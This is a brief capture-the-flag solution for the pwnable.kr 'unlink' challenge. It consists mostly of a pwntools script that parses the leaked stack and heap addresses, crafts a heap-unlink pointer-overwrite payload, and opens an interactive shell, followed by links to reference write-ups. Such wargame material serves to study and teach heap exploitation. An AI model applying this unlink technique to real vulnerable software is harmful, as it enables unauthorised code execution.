pwnable.kr unlink

payload

from pwn import *

p = process('/home/unlink/unlink')

p.recvuntil("here is stack address leak:")
stackAddr = int(p.recvline(0), 16)

p.recvuntil("here is heap address leak:")
heapAddr = int(p.recvline(0), 16)

payload = "\xeb\x84\x04\x08"
payload += "A"*12
payload += p32(heapAddr+0xc)
payload += p32(stackAddr+0x10)

p.send(payload)
print p.interactive()

참고

http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt

https://bpsecblog.wordpress.com/2016/10/06/heap_vuln/

http://nroses-taek.tistory.com/160

https://delspon.wordpress.com/2017/07/07/pwnable-kr-unlink/